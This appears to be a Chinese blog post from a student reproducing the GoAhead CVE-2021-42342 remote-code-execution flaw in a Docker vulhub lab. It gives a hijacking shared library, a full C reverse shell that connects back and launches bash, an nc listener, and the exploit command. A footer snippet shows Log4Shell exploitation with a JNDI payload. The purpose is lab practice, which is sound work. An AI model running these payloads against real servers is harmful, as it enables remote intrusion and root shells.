CVE-2021-42342漏洞复现及docker环境搭建

原创 已于 2022-07-18 22:42:53 修改 · 3.5k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#docker #容器 #linux #web安全

于 2022-07-18 22:42:12 首次发布
本文详细记录了在Docker环境下复现Goahead web服务器的CVE-2021-42342漏洞的过程,包括环境搭建、漏洞利用代码编写、反弹shell等步骤,同时介绍了如何将容器导出为tar包并使用start.sh启动。此外,还分享了如何通过poc.py脚本发送恶意数据包以复现漏洞。

目录

一、前言

二、环境搭建

三、参考链接

一、前言

解决问题用到的命令:docker logs 容器id#查看日志,可以看报错的原因。

最终运行容器的命令:docker run -d -p 8083:80 -v /home/liznal/vulhub-master/goahead/CVE-2021-42342/index:/var/www/goahead/cgi-bin/index:rw e2:latest /start.sh

这是一次线上实习的作业,老师要求将漏洞环境搭建在容器内,并将容器导出为tar包,这比简单的复现漏洞要复杂一些些,给我这个小白带来了许多麻烦,网上也没有与我情况相同的博客,因此我将这次复现过程记录下来。

二、环境搭建

1、环境:Ubuntu18.04,Python3.6.9(Python必须在3.6及以上,否则不能用poc.py)

2、下载vulhub-master并解压,下载方式百度即可。

3、进入漏洞所在文件夹

4、将我做好的tar包导入为镜像,tar包里有我做的start.sh,一会要用它启动容器。

docker import e2.tar e2:latest 

注:这一步可以直接使用docker-compose导入镜像,

在vulhub-master/goahead/CVE-2021-42342文件夹下执行docker-compose up -d即可

 5、用如下命令启动容器:

docker run -d -p 8083:80 -v /home/liznal/vulhub-master/goahead/CVE-2021-42342/index:/var/www/goahead/cgi-bin/index:rw e2:latest /start.sh

【注】:如果使用docker-compse,不需考虑-p参数和-v参数,yml文件都写好了,导入镜像直接用就OK

其中,-p为指定端口映射,-v后面的参数为容器挂载目录(vulhub-master.zip解压后产生的目录),即挂载的主机目录:容器目录:rw(rw意为读写),e2:latest为镜像名:标签,最后是以start.sh脚本启动。-v后面的参数很重要,是后面验证漏洞复现成功的关键。

 6、访问IP:8083,出现如下页面代表访问成功。

7、编写打印测试文件的poc代码如下(poc.c):

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)

{

    write(1, "Hello: World\r\n\r\n", 16);

    write(1, "Hacked\n", 7);

}

8、这样,before_main函数将在程序执行前被调用。编译以上代码:

gcc -s-shared -fPIC ./poc.c -o payload.so

9、然后,我们使用poc.py脚本来发送恶意数据包,复现漏洞:

python3 poc.py http://172.17.0.1:8083/cgi-bin/index payload.so(index和payload.so之间有空格,否则会Traceback Error,而且一定要用python3执行,且python版本应大于3.6,否则脚本文件代码运行会报错)

可见,我们编写的劫持代码已经被成功执行:

10、反弹shell的poc代码如下(shell.c):

#include<stdio.h>

#include<stdlib.h>

#include<sys/socket.h>

#include<netinet/in.h>

char *server_ip="172.17.0.1";/*The server which accepts shell*/

uint32_t server_port=7777;/*The port which you listen to*/

static void reverse_shell(void) __attribute__((constructor));

static void reverse_shell(void)

{

  int sock = socket(AF_INET, SOCK_STREAM, 0);

  struct sockaddr_in attacker_addr = {0};

  attacker_addr.sin_family = AF_INET;

  attacker_addr.sin_port = htons(server_port);

  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);

  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)

    exit(0);

  dup2(sock, 0);

  dup2(sock, 1);

  dup2(sock, 2);

  execve("/bin/bash", 0, 0);

}

11、使用如下命令编译以上代码:

gcc -s-shared -fPIC ./shell.c -o shell.so

12、在对应的ip端口上开启监听(开启另一个终端):

nc -lvnp 7777

13、执行payload,此时脚本可能会报错,但没有影响。

python3 poc.py http://target-ip:8083/cgi-bin/index shell.so

(注意index和shell之间有空格!)

14、当终端显示Connection from x.x.x.x xxxx received,我们输入whoami命令显示自身用户名称,可以看到我们是root用户,成功触发RCE。

三、用start.sh启动的tar包如何搭建?

其实非常简单,但是网上没有博客写过,本小白花了挺长时间才搞明白。

直接docker run -v /home/liznal/vulhub-master/goahead/CVE-2021-42342/index:/var/www/goahead/cgi-bin/index:rw -d -p 8082:80 vulhub/goahead:5.1.4,就得到了一个没有start.sh的容器,在根目录下vim start.sh,写入如下内容:

#!/bin/bash

goahead -v --home /etc/goahead /var/html/goahead

然后把容器导出为tar包就大功告成。

附上本人tar包链接:https://pan.baidu.com/s/17s72XYOSicZlu7ra1Tot1g 提取码: gl4u 

四、参考链接

(1)https://github.com/vulhub/vulhub/blob/master/goahead/CVE-2021-42342(poc.py、shell.c、payload.c都在这里,vulhub-master.zip已经包含了它)

(2)http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_5298.html

(3)https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg

(4)https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562

(5)https://ahmed-belkahla.me/post/2-methods-rce-0-day-in-goahead-webserver-pbctf-2021/

li2na1
关注
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
04-08
上述内容详细阐述了CMS Made Simple前台代码执行漏洞CVE-2021-26120的背景、影响、利用方式、环境搭建复现步骤、POC代码解释以及防范措施,并提供了相关的参考资料。读者在理解了这些知识点之后,应该能够更好地...
[ vulhub漏洞复现篇 ] Jetty 不明确路径信息泄露漏洞CVE-2021-28164)
qq_51577576的博客
09-11 2325
[ vulhub漏洞复现篇 ] Jetty 不明确路径信息泄露漏洞CVE-2021-28164) . 和 .. 称为点段,都是为路径名层次结构中的相对引用而定义的,它们在一些操作系统文件目录结构中分别代表当前目录和父目录。但是与文件系统不同的是,这些点段仅在 URI 路径中解释层次结构,并作为解析过程的一部分被删除。也就是说在解析URI路径时,需要先处理 . 和 .. Jetty为了符合这种处理方式,却导致了一系列的漏洞产生
GoAhead Server 环境变量注入(CVE-2021-42342漏洞复现
Tauil的博客
08-06 1167
此时的shell没有成功回显,可以先暂停shell,因为是环境变量注入,等待一段时间后便能再次连接。vulhub/goahead/CVE-2021-42342 环境搭建。登录靶机IP网页即可访问,使用文件中带的poc.py。同样的步骤,将其编译发送即可。进行base64编码。...
漏洞复现CVE-2021-42342 GoAhead Server
m0_53121608的博客
07-13 1130
漏洞复现CVE-2021-42342 GoAhead Server
Nacos数据库接口漏洞CVE-2021-29442深度解析
最新发布
2202_75728825的博客
09-21 219
Nacos数据库接口存在未授权查询漏洞CVE-2021-29442),攻击者可通过/nacos/v1/cs/ops/derby路径利用sql参数执行任意SELECT查询操作。该漏洞源于鉴权缺失,但受限于代码仅允许查询操作。可查询的表包括用户、权限、租户等敏感数据表。漏洞复现时需提供sql参数,成功查询将返回数据库信息。该漏洞可能导致敏感数据泄露,建议及时升级修复。
【vulhub靶场复现系列】CVE-2021-42342 GoAhead Server 环境变量注入复现
Wiofgb的博客
09-01 1462
【vulhub靶场复现系列】记录一次CVE-2021-42342 GoAhead Server 环境变量注入复现
GoAhead远程命令执行漏洞(CVE-2021-42342)
huayimy的博客
10-31 2406
复现GoAhead远程命令执行漏洞(CVE-2021-42342)
GoAhead-Server-环境变量注入(CVE-2021-42342)
bqnagus
10-01 551
GoAhead-Server-环境变量注入(CVE-2021-42342)
CVE-2021-44228 漏洞复现记录(基于 Vulhub 靶场)
2301_81476211的博客
08-22 1226
本文介绍了Apache Log4j2远程代码执行漏洞CVE-2021-44228)的背景、发现过程及复现方法。该漏洞由阿里云安全团队发现,影响Log4j2 2.0-beta9至2.14.1版本,允许攻击者通过JNDI注入执行任意代码。文章详细对比了两种漏洞利用工具:JNDIExploit支持自定义恶意命令,灵活性高;log4j-scan自动化程度高,适合批量检测。复现过程中需注意端口占用、JDK版本兼容性等问题。该漏洞影响广泛,成为2021年最严重的安全漏洞之一。
Webmin(CVE-2021-31760)CSRF-RCE环境搭建-漏洞复现
weixin_45006525的博客
04-29 1841
Webmin(CVE-2021-31760) 漏洞简介: Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。 近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760,CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 以下复现第一个CVE-2021-31760 影响范
CVE Docker逃逸漏洞复现
8888的博客
06-15 1259
它允许开发者将他们的应用及其依赖包打包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,并且实现虚拟化。docker可以安装软件,也可以安装一个操作系统。需要在不同操作系统中引入一个中间层,中间层很多版本,可以在Windows、Linux、centos等等的不同操作系统之间引入一个中间层,可以用来屏蔽底层环境的差异。靶机:需要先运行一个拥有命令行的镜像比如 ubuntu:18.04 ,我们需要在进入镜像,在容器的命令行执行下载远程恶意文件,我们给他增加权限,然后执行。
最新Docker搭建DVWA和SQLi-LABS漏洞练习平台
Ms08067安全实验室
07-28 458
点击星标,即时接收最新推文本文选自《web安全攻防渗透测试实战指南(第2版)》五折购买链接:u.jd.com/3ibjeF6搭建DVWADVWA是一款开源的渗透测试漏洞练习平台,内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等漏洞的测试环境。可以在DockerHub上搜索DVWA,有多个用户共享了搭建好的DVWA镜像(注意,有些镜像可能存在后门),此处选择镜像——sagikaza...
基于docker方式部署Webgoat漏洞实验平台
qq_44484541的博客
05-04 876
线程安全
docker快速入门以及漏洞环境搭建
alert['Hello World']
07-25 3463
docker快速入门 为什么要学习docker?   在渗透学习的路上,docker能够快速帮我们搭建环境
Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 809
Docker复现SpringBoot CVE-2016-4977
【P2】VMware 下 docker 快速搭建漏洞靶场 DVWA
qq_45138120的博客
06-23 4176
包括什么是 dockerdocker 和虚拟机的的区别、docker 搭建 DVWA 及执行步骤、为 kali 配置 docker 加速器、访问 dockerhub 的 dvwa 镜像、vulhub 搭建漏洞复现
利用docker搭建简易漏洞复现环境
thj_blog
01-21 3194
1. 先搭建docker(之前的博客已经写过,如果大家有兴趣的话可以看一下) 2.使用命令搭建 medicean/vulapps  镜像   docker pull   medicean/vulapps  3. 下载tag https://github.com/Medicean/VulApps 4.  直接使用 docker 命令拉取相关镜像,并启动。 需要查看相关环境的 tag 在...
渗透测试之利用docker实现对CVE-2018-12613的复现
LKmnbZ's Blog
11-08 486
利用phpmyadmin相关的点 尝试使用docker复现 https://github.com/vulhub/vulhub 1. Installation Install the docker/docker-compose on Ubuntu 16.04: # Install pip curl -s https://bootstrap.pypa.io/get-pip.py | p...
指定SpringBoot内嵌Tomcat的版本,修复(CVE-2021-42340)漏洞
热门推荐
zzhongcy的专栏
11-15 1万+
1、查看当前使用的Tomcat版本号 1.1、Maven Repository中查看 比如我们需要查Spring Boot 2.3.12.RELEASE 的内嵌Tomcat版本, 可以打开链接: https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent/2.3.12.RELEASE 如下图, 红框标记的就是tomcat的版本。 1.2、查看depen...
centos通过docker来去vulhub中CVE-2021-44228漏洞,实现复现,给出完整命令
03-21
<think>嗯,用户想了解如何在CentOS上使用Docker复现Vulhub中的CVE-2021-44228漏洞,也就是Log4j2的那个远程代码执行漏洞。首先,我需要确认用户的需求。他们可能是一个安全研究人员或者正在学习漏洞复现的学生,想要实际操作这个漏洞来理解其原理和影响。 首先,我需要考虑用户的环境是CentOS系统,所以需要确保所有步骤都适用于CentOS。然后,使用Docker和Vulhub来搭建漏洞环境,这需要安装DockerDocker Compose。可能用户已经安装了这些工具,但如果没有,应该给出安装命令。比如,CentOS下安装Docker的步骤,以及如何启动Docker服务。同时,需要提醒用户如果遇到权限问题,可能需要将用户加入docker组。 接下来,下载Vulhub的漏洞环境。Vulhub通常通过GitHub仓库获取,所以需要克隆仓库到本地,并进入对应的CVE-2021-44228目录。这里可能需要提醒用户如果没有安装git的话需要先安装git,不过Vulhub也可能直接下载压缩包,但通常克隆仓库更方便。 然后,构建和启动Docker容器。使用docker-compose up -d命令,这时候可能会遇到镜像下载慢的问题,可能需要更换国内镜像源,比如阿里云或者中科大的源。用户如果之前没有使用过Docker Compose,可能需要确认是否安装了docker-compose插件,因为较新版本的Docker已经整合了compose作为插件,所以命令可能是docker compose而不是docker-compose。 漏洞复现部分,需要说明如何触发漏洞。通常是通过发送带有恶意JNDI的请求,比如使用curl命令或者构造特定的HTTP请求。这里可能需要使用到像ldap://或rmi://的地址,指向一个恶意服务器,比如使用JNDI-Injection-Exploit工具来启动一个恶意的LDAP服务。用户需要下载这个工具,并运行相应的命令,指定攻击者的IP和端口,以及要执行的命令,比如反弹shell或者计算器弹出(在Windows测试时)。 测试部分,可能需要向目标服务发送带有恶意payload的请求,比如在用户代理或者任何可能记录日志的字段中插入${jndi:ldap://攻击者IP:端口/恶意类}。这时候需要确保目标服务确实使用有漏洞的Log4j2版本,并且网络连通性没有问题,攻击者的LDAP服务端口是否开放,防火墙是否允许等。 注意事项方面,要提醒用户在隔离环境中操作,避免对真实系统造成影响。同时,复现完成后,关闭和清理Docker容器,释放资源。可能还需要解释每个步骤的作用,比如docker-compose down是停止并删除容器,避免占用端口和资源。 另外,用户可能需要验证漏洞是否成功触发,比如在攻击者机器上监听某个端口,看是否有连接进来,或者目标容器是否执行了恶意命令。比如,使用nc -lvnp 9999来监听反弹shell的连接。 总结整个流程的话,步骤大致是:安装依赖工具→下载漏洞环境→启动容器→配置攻击机→发送恶意请求→验证结果→清理环境。需要确保每个步骤的命令正确无误,特别是替换用户的实际IP和端口。同时,可能需要解释一些概念,比如JNDI、LDAP服务的作用,以及为什么Log4j2的漏洞会导致RCE,帮助用户更深入理解。</think>以下是使用Docker在CentOS上复现Log4j2漏洞(CVE-2021-44228)的完整步骤: --- ### 一、环境准备 1. **安装Docker** ```bash sudo yum install -y yum-utils sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo sudo yum install docker-ce docker-ce-cli containerd.io sudo systemctl start docker && sudo systemctl enable docker ``` 2. **安装Docker Compose** ```bash sudo curl -L "https://github.com/docker/compose/releases/download/v2.23.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose ``` --- ### 二、漏洞环境搭建 1. **下载Vulhub漏洞库** ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/log4j/CVE-2021-44228 ``` 2. **启动漏洞环境** ```bash docker-compose up -d # 查看运行状态 docker-compose ps ``` --- ### 三、漏洞验证 1. **安装漏洞利用工具** ```bash # 下载JNDI注入工具 git clone https://github.com/feihong-cs/JNDI-Injection-Exploit.git cd JNDI-Injection-Exploit mvn clean package -DskipTests ``` 2. **启动LDAP恶意服务** ```bash # 替换192.168.1.100为你的攻击机IP java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/pwned" -A 192.168.1.100 ``` 3. **发送恶意请求** ```bash # 向目标发送payload(替换your-ip为攻击机IP) curl -H 'User-Agent: ${jndi:ldap://your-ip:1389/exp}' http://localhost:8080 ``` --- ### 四、结果验证 ```bash # 进入容器查看命令执行结果 docker exec -it [容器ID] ls /tmp # 如果看到pwned文件,说明漏洞利用成功 ``` --- ### 五、环境清理 ```bash # 在漏洞目录执行 docker-compose down # 删除镜像 docker rmi vulhub/log4j:2.15.0 ``` --- ### 关键原理说明 1. 漏洞触发机制:通过Log4j2的JNDI功能实现远程代码加载 2. 漏洞利用条件:使用Log4j2 ≤ 2.14.1且开启JNDI功能 3. 修复方案:升级至Log4j2 ≥ 2.16.0 --- ### 注意事项 1. 所有操作应在隔离的测试环境中进行 2. 实际攻击IP需要替换为真实地址 3. 建议结合Wireshark抓包分析流量特征 4. 复现完成后请及时销毁环境 如需更详细的漏洞分析或遇到部署问题,可以补充说明具体情况。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值